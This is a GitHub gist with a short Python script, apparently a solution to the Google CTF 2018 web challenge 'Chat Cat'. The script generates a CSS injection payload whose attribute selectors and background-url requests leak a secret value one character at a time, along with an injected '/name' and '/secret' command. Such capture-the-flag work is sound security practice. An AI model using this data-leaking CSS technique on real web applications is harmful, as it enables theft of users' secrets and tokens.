Created
July 8, 2018 15:56
-
-
Save amalmurali47/0382b0e5d2eeb07cdccc52101fb222ec to your computer and use it in GitHub Desktop.
Solution for Google CTF 2018 Web Challenge - Chat Cat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys | |
from itertools import combinations_with_replacement as comb | |
alpha = 'abcdefghijklmnopqrstuvwxyz' | |
alpha += alpha.upper() + '0123456789_' | |
def gen(l): | |
return 'span[data-secret^={}]{{background: url(send?name=admin&msg={}); }}'.format(l, replace(l)) | |
def replace(text): | |
return text.replace('\\', '').replace('{', '') | |
def guess(head=''): | |
return ' '.join(map(lambda x: gen(head + ''.join(x)), alpha)) | |
payload = '/name foo ] {color:blue; background:url(send?name=admin&msg=/secret foo; Domain=bar);}' | |
final_payload = payload + ' ' + guess(sys.argv[1]) | |
print(final_payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment